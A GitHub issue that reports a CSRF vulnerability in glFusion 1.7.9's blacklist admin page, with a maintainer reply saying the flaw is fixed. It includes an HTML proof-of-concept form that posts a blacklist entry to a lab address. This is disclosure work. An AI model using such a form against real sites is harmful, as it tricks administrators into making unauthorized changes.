We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Attackers can construct blacklist IP addresses. Using the CSRF vulnerability to trick the administrator to click, can add a blacklist
poc
<body> <script>history.pushState('', '', '/')</script> <form action="http://192.168.255.130/glfusion-1.7.9/public_html/admin/plugins/bad_behavior2/blacklist.php" method="POST"> <input type="hidden" name="mode" value="addsave" /> <input type="hidden" name="bl_type" value="spambot_ip" /> <input type="hidden" name="bl_item" value="1.1.1.121" /> <input type="hidden" name="ban_reason" value="ipbrute" /> <input type="hidden" name="submit" value="Submit" /> <input type="submit" value="Submit request" /> </form> </body> </html>
The text was updated successfully, but these errors were encountered:
Sorry, something went wrong.
Adding CSRF support for blacklist entry / edit.
Fixed with b380ead
mark0263
No branches or pull requests
Attackers can construct blacklist IP addresses. Using the CSRF vulnerability to trick the administrator to click, can add a blacklist
poc
The text was updated successfully, but these errors were encountered: